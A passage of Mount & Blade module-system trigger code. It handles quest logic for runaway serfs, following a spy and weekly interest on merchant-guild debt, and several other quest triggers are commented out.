(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_bring_back_runaway_serfs_party_3"),
(gt, ":cur_distance", 3),
(party_set_ai_object, "$qst_bring_back_runaway_serfs_party_3", ":quest_target_center"),
(try_end),
(try_end),
(assign, ":sum_removed", "$qst_bring_back_runaway_serfs_num_parties_returned"),
(val_add, ":sum_removed", "$qst_bring_back_runaway_serfs_num_parties_fleed"),
(ge, ":sum_removed", 3),
(try_begin),
(ge, "$qst_bring_back_runaway_serfs_num_parties_returned", 3),
(call_script, "script_succeed_quest", "qst_bring_back_runaway_serfs"),
(else_try),
(eq, "$qst_bring_back_runaway_serfs_num_parties_returned", 0),
(call_script, "script_fail_quest", "qst_bring_back_runaway_serfs"),
(else_try),
(call_script, "script_conclude_quest", "qst_bring_back_runaway_serfs"),
(try_end),
],
[]
),
### Defend Nobles Against Peasants quest
## (0.2, 0.0, 0.0,
## [
## (check_quest_active, "qst_defend_nobles_against_peasants"),
## (neg|check_quest_succeeded, "qst_defend_nobles_against_peasants"),
## (neg|check_quest_failed, "qst_defend_nobles_against_peasants"),
## (quest_get_slot, ":quest_target_center", "qst_defend_nobles_against_peasants", slot_quest_target_center),
## (assign, ":num_active_parties", 0),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_1", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_1"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_1", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_1"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_1"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_2", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_2"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_2", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_2"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_2"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_3", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_3"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_3", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_3"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_3"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_4", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_4"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_4", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_4"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_4"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_5", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_5"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_5", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_5"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_5"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_6", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_6"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_6", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_6"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_6"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_7", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_7"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_7", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_7"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_7"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_8", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_8"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_8", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_8"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_8"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (eq, ":num_active_parties", 0),
## (try_begin),
## (store_div, ":limit", "$qst_defend_nobles_against_peasants_num_nobles_to_save", 2),
## (ge, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":limit"),
## (call_script, "script_succeed_quest", "qst_defend_nobles_against_peasants"),
## (else_try),
## (call_script, "script_fail_quest", "qst_defend_nobles_against_peasants"),
## (try_end),
## ],
## []
## ),
### Capture Conspirators quest
## (0.15, 0.0, 0.0,
## [
## (check_quest_active, "qst_capture_conspirators"),
## (neg|check_quest_succeeded, "qst_capture_conspirators"),
## (neg|check_quest_failed, "qst_capture_conspirators"),
## (quest_get_slot, ":quest_target_center", "qst_capture_conspirators", slot_quest_target_center),
## (quest_get_slot, ":faction_no", "qst_capture_conspirators", slot_quest_target_faction),
## (try_begin),
## (gt, "$qst_capture_conspirators_num_parties_to_spawn", "$qst_capture_conspirators_num_parties_spawned"),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 20),
## (set_spawn_radius, 3),
## (spawn_around_party,":quest_target_center","pt_conspirator"),
## (val_add, "$qst_capture_conspirators_num_parties_spawned", 1),
## (party_get_num_companions, ":num_companions", reg0),
## (val_add, "$qst_capture_conspirators_num_troops_to_capture", ":num_companions"),
## (party_set_ai_behavior, reg0, ai_bhvr_travel_to_party),
## (party_set_ai_object, reg0, "$qst_capture_conspirators_party_1"),
## (party_set_flags, reg0, pf_default_behavior, 0),
## (try_begin),
## (le, "$qst_capture_conspirators_party_2", 0),
## (assign, "$qst_capture_conspirators_party_2", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_3", 0),
## (assign, "$qst_capture_conspirators_party_3", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_4", 0),
## (assign, "$qst_capture_conspirators_party_4", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_5", 0),
## (assign, "$qst_capture_conspirators_party_5", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_6", 0),
## (assign, "$qst_capture_conspirators_party_6", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_7", 0),
## (assign, "$qst_capture_conspirators_party_7", reg0),
## (try_end),
## (try_end),
##
## (assign, ":num_active_parties", 0),
##
## (try_begin),
## (gt, "$qst_capture_conspirators_party_1", 0),
## (party_is_active, "$qst_capture_conspirators_party_1"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_1"),
## (else_try),
## (party_get_num_attached_parties, ":num_attachments", "$qst_capture_conspirators_party_1"),
## (gt, ":num_attachments", 0),
## (assign, ":leave_meeting", 0),
## (try_begin),
## (store_sub, ":required_attachments", "$qst_capture_conspirators_num_parties_to_spawn", 1),
## (eq, ":num_attachments", ":required_attachments"),
## (val_add, "$qst_capture_conspirators_leave_meeting_counter", 1),
## (ge, "$qst_capture_conspirators_leave_meeting_counter", 15),
## (assign, ":leave_meeting", 1),
## (try_end),
## (try_begin),
## (eq, "$qst_capture_conspirators_num_parties_to_spawn", "$qst_capture_conspirators_num_parties_spawned"),
## (store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_capture_conspirators_party_1"),
## (assign, ":min_distance", 3),
## (try_begin),
## (is_currently_night),
## (assign, ":min_distance", 2),
## (try_end),
## (lt, ":cur_distance", ":min_distance"),
## (assign, "$qst_capture_conspirators_leave_meeting_counter", 15),
## (assign, ":leave_meeting", 1),
## (try_end),
## (eq, ":leave_meeting", 1),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_1", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_1", pf_default_behavior, 0),
## (party_get_position, pos1, "$qst_capture_conspirators_party_1"),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_1", pos2),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_2", 0),
## (party_detach, "$qst_capture_conspirators_party_2"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_2", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_2", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_2", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_3", 0),
## (party_detach, "$qst_capture_conspirators_party_3"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_3", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_3", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_3", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_4", 0),
## (party_detach, "$qst_capture_conspirators_party_4"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_4", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_4", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_4", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_5", 0),
## (party_detach, "$qst_capture_conspirators_party_5"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_5", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_5", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_5", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_6", 0),
## (party_detach, "$qst_capture_conspirators_party_6"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_6", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_6", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_6", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_7", 0),
## (party_detach, "$qst_capture_conspirators_party_7"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_7", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_7", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_7", pos2),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_1"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_1"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_1"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_1", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_1", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_1", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_1", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_2", 0),
## (party_is_active, "$qst_capture_conspirators_party_2"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_2"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_2", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_2"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_2"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_2", ai_bhvr_hold),
## (party_attach_to_party, "$qst_capture_conspirators_party_2", "$qst_capture_conspirators_party_1"),
## (party_set_flags, "$qst_capture_conspirators_party_2", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_2"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_2"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_2"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_2", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_2", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_2", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_2", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_3", 0),
## (party_is_active, "$qst_capture_conspirators_party_3"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_3"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_3", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_3"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_3"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_3", ai_bhvr_hold),
## (party_attach_to_party, "$qst_capture_conspirators_party_3", "$qst_capture_conspirators_party_1"),
## (party_set_flags, "$qst_capture_conspirators_party_3", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_3"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_3"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_3"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_3", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_3", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_3", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_3", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_4", 0),
## (party_is_active, "$qst_capture_conspirators_party_4"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_4"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_4", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_4"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_4"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_4", ai_bhvr_hold),
## (party_set_flags, "$qst_capture_conspirators_party_4", pf_default_behavior, 0),
## (party_attach_to_party, "$qst_capture_conspirators_party_4", "$qst_capture_conspirators_party_1"),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_4"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_4"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_4"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_4", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_4", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_4", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_4", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_5", 0),
## (party_is_active, "$qst_capture_conspirators_party_5"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_5"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_5", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_5"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_5"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_5", ai_bhvr_hold),
## (party_set_flags, "$qst_capture_conspirators_party_5", pf_default_behavior, 0),
## (party_attach_to_party, "$qst_capture_conspirators_party_5", "$qst_capture_conspirators_party_1"),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_5"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_5"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_5"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_5", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_5", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_5", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_5", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_6", 0),
## (party_is_active, "$qst_capture_conspirators_party_6"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_6"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_6", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_6"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_6"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_6", ai_bhvr_hold),
## (party_set_flags, "$qst_capture_conspirators_party_6", pf_default_behavior, 0),
## (party_attach_to_party, "$qst_capture_conspirators_party_6", "$qst_capture_conspirators_party_1"),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_6"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_6"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_6"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_6", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_6", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_6", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_6", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_7", 0),
## (party_is_active, "$qst_capture_conspirators_party_7"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_7"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_7", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_7"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_7"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_7", ai_bhvr_hold),
## (party_set_flags, "$qst_capture_conspirators_party_7", pf_default_behavior, 0),
## (party_attach_to_party, "$qst_capture_conspirators_party_7", "$qst_capture_conspirators_party_1"),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_7"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_7"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_7"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_7", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_7", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_7", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_7", pf_default_behavior, 0),
## (try_end),
## (try_end),
##
## (eq, ":num_active_parties", 0),
## (party_count_prisoners_of_type, ":count_captured_conspirators", "p_main_party", "trp_conspirator"),
## (party_count_prisoners_of_type, ":count_captured_conspirator_leaders", "p_main_party", "trp_conspirator_leader"),
## (val_add, ":count_captured_conspirators", ":count_captured_conspirator_leaders"),
## (try_begin),
## (store_div, ":limit", "$qst_capture_conspirators_num_troops_to_capture", 2),
## (gt, ":count_captured_conspirators", ":limit"),
## (call_script, "script_succeed_quest", "qst_capture_conspirators"),
## (else_try),
## (call_script, "script_fail_quest", "qst_capture_conspirators"),
## (try_end),
## ],
## []
## ),
# Follow Spy quest
(0.5, 0.0, 0.0,
[
(check_quest_active, "qst_follow_spy"),
(eq, "$qst_follow_spy_no_active_parties", 0),
(quest_get_slot, ":quest_giver_center", "qst_follow_spy", slot_quest_giver_center),
(quest_get_slot, ":quest_object_center", "qst_follow_spy", slot_quest_object_center),
(assign, ":abort_meeting", 0),
(try_begin),
(this_or_next|ge, "$qst_follow_spy_run_away", 2),
(this_or_next|neg|party_is_active, "$qst_follow_spy_spy_party"),
(neg|party_is_active, "$qst_follow_spy_spy_partners_party"),
(else_try),
(eq, "$qst_follow_spy_meeting_state", 0),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_follow_spy_spy_party"),
(try_begin),
(assign, ":min_distance", 3),
(try_begin),
(is_currently_night),
(assign, ":min_distance", 1),
(try_end),
(le, ":cur_distance", ":min_distance"),
(store_distance_to_party_from_party, ":player_distance_to_quest_giver_center", "p_main_party", ":quest_giver_center"),
(gt, ":player_distance_to_quest_giver_center", 1),
(val_add, "$qst_follow_spy_run_away", 1),
(try_begin),
(eq, "$qst_follow_spy_run_away", 2),
(assign, ":abort_meeting", 1),
(display_message, "str_qst_follow_spy_noticed_you"),
(try_end),
(else_try),
(store_distance_to_party_from_party, ":cur_distance", "$qst_follow_spy_spy_partners_party", "$qst_follow_spy_spy_party"),
(le, ":cur_distance", 1),
(party_attach_to_party, "$qst_follow_spy_spy_party", "$qst_follow_spy_spy_partners_party"),
(assign, "$qst_follow_spy_meeting_state", 1),
(assign, "$qst_follow_spy_meeting_counter", 0),
(try_end),
(else_try),
(eq, "$qst_follow_spy_meeting_state", 1),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_follow_spy_spy_partners_party"),
(try_begin),
(le, ":cur_distance", 1),
(party_detach, "$qst_follow_spy_spy_party"),
(val_add, "$qst_follow_spy_run_away", 1),
(try_begin),
(eq, "$qst_follow_spy_run_away", 2),
(assign, ":abort_meeting", 1),
(display_message, "str_qst_follow_spy_noticed_you"),
(try_end),
(else_try),
(val_add, "$qst_follow_spy_meeting_counter", 1),
(gt, "$qst_follow_spy_meeting_counter", 4),
(party_detach, "$qst_follow_spy_spy_party"),
(assign, ":abort_meeting", 1),
(assign, "$qst_follow_spy_meeting_state", 2),
(try_end),
(try_end),
(try_begin),
(eq, ":abort_meeting", 1),
(party_set_ai_object, "$qst_follow_spy_spy_party", ":quest_giver_center"),
(party_set_ai_object, "$qst_follow_spy_spy_partners_party", ":quest_object_center"),
(party_set_ai_behavior, "$qst_follow_spy_spy_party", ai_bhvr_travel_to_party),
(party_set_ai_behavior, "$qst_follow_spy_spy_partners_party", ai_bhvr_travel_to_party),
(party_set_flags, "$qst_follow_spy_spy_party", pf_default_behavior, 0),
(party_set_flags, "$qst_follow_spy_spy_partners_party", pf_default_behavior, 0),
(try_end),
(assign, ":num_active", 0),
(try_begin),
(party_is_active, "$qst_follow_spy_spy_party"),
(val_add, ":num_active", 1),
(party_is_in_town, "$qst_follow_spy_spy_party", ":quest_giver_center"),
(remove_party, "$qst_follow_spy_spy_party"),
(assign, "$qst_follow_spy_spy_back_in_town", 1),
(val_sub, ":num_active", 1),
(try_end),
(try_begin),
(party_is_active, "$qst_follow_spy_spy_partners_party"),
(val_add, ":num_active", 1),
(party_is_in_town, "$qst_follow_spy_spy_partners_party", ":quest_object_center"),
(remove_party, "$qst_follow_spy_spy_partners_party"),
(assign, "$qst_follow_spy_partner_back_in_town", 1),
(val_sub, ":num_active", 1),
(try_end),
(try_begin),
(eq, "$qst_follow_spy_partner_back_in_town",1),
(eq, "$qst_follow_spy_spy_back_in_town",1),
(call_script, "script_fail_quest", "qst_follow_spy"),
(try_end),
(try_begin),
(eq, ":num_active", 0),
(assign, "$qst_follow_spy_no_active_parties", 1),
(party_count_prisoners_of_type, ":num_spies", "p_main_party", "trp_spy"),
(party_count_prisoners_of_type, ":num_spy_partners", "p_main_party", "trp_spy_partner"),
(gt, ":num_spies", 0),
(gt, ":num_spy_partners", 0),
(call_script, "script_succeed_quest", "qst_follow_spy"),
(try_end),
],
[]
),
### Raiders quest
## (0.95, 0.0, 0.2,
## [
## (check_quest_active, "qst_hunt_down_raiders"),
## (neg|check_quest_succeeded, "qst_hunt_down_raiders"),
## (neg|check_quest_failed, "qst_hunt_down_raiders"),
## ],
## [
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (party_set_ai_behavior, ":quest_target_party", ai_bhvr_hold),
## (party_set_flags, ":quest_target_party", pf_default_behavior, 0),
## ]
## ),
##
## (0.7, 0, 0.2,
## [
## (check_quest_active, "qst_hunt_down_raiders"),
## (neg|check_quest_succeeded, "qst_hunt_down_raiders"),
## (neg|check_quest_failed, "qst_hunt_down_raiders"),
## ],
## [
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (party_set_ai_behavior,":quest_target_party",ai_bhvr_travel_to_party),
## (party_set_flags, ":quest_target_party", pf_default_behavior, 0),
## ]
## ),
##
## (0.1, 0.0, 0.0,
## [
## (check_quest_active, "qst_hunt_down_raiders"),
## (neg|check_quest_succeeded, "qst_hunt_down_raiders"),
## (neg|check_quest_failed, "qst_hunt_down_raiders"),
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (neg|party_is_active, ":quest_target_party")
## ],
## [
## (call_script, "script_succeed_quest", "qst_hunt_down_raiders"),
## ]
## ),
##
## (1.3, 0, 0.0,
## [
## (check_quest_active, "qst_hunt_down_raiders"),
## (neg|check_quest_succeeded, "qst_hunt_down_raiders"),
## (neg|check_quest_failed, "qst_hunt_down_raiders"),
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (quest_get_slot, ":quest_target_center", "qst_hunt_down_raiders", slot_quest_target_center),
## (party_is_in_town,":quest_target_party",":quest_target_center")
## ],
## [
## (call_script, "script_fail_quest", "qst_hunt_down_raiders"),
## (display_message, "str_raiders_reached_base"),
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (remove_party, ":quest_target_party"),
## ]
## ),
##### TODO: QUESTS COMMENT OUT END
#########################################################################
# Random MERCHANT quest triggers
####################################
# Apply interest to merchants guild debt 1% per week
(24.0 * 7, 0.0, 0.0,
[],
[
(val_mul,"$debt_to_merchants_guild",101),
(val_div,"$debt_to_merchants_guild",100)
]
),
#SB : deprecate these triggers, set party order directly
# Escort merchant caravan:
(1, 0.0, ti_once, [
# (check_quest_active, "qst_escort_merchant_caravan"),
# (eq, "$escort_merchant_caravan_mode", 1)
],
[
# (quest_get_slot, ":quest_target_party", "qst_escort_merchant_caravan", slot_quest_target_party),
# (try_begin),
# (party_is_active, ":quest_target_party"),
